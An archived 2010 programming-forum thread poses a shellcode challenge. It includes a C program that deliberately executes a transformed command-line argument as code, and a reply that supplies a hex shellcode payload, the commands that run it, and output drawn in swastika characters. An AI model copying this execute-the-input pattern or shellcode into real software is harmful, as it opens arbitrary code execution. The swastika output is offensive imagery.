Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

/prog/ challenge

Name: Anonymous 2010-11-16 17:30

exploit

#include <stdio.h>
#include <string.h>

#define MAX 0xFF

int main(int argc, char **argv)
{
        if (argc != 2)
                return 1;
        else {
                char buf[MAX];
                int i;

                strncpy(buf, argv[1], MAX);

                for (i = 0; i < strlen(buf); ++i)
                        buf[i] = (buf[i] - (i % 0xF)) ^ i;

                ((void(*)())buf)();

                return 0;
        }
}

Name: Anonymous 2010-11-17 6:27

The challenge is writing a shellcode that a) doesn't contain nulls when encrypted (in order to get past the strncpy) b) doesn't contain nulls when decrypted (to get past the strlen(buf) test in the loop) and c) still does something interesting.

Here's mine. It prints out a neat fractal!


$ cat payload.txt                 
6a0e5dddeee1782a045b95832b531b98ac94fcf3fbe73e27e0450e8af099
369652f54a58e1a50d14e7061bae66c48e23aa8e7e48d5b65950d4ae6b5e
c4ec123f84ae86a82687
$ xxd -ps -r payload.txt > payload
$ ./exploitable "`cat payload`"
         卐
       卐
     卐      卐
       卐  卐  卐
 卐      卐      卐
   卐  卐  卐
     卐      卐
           卐
         卐
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -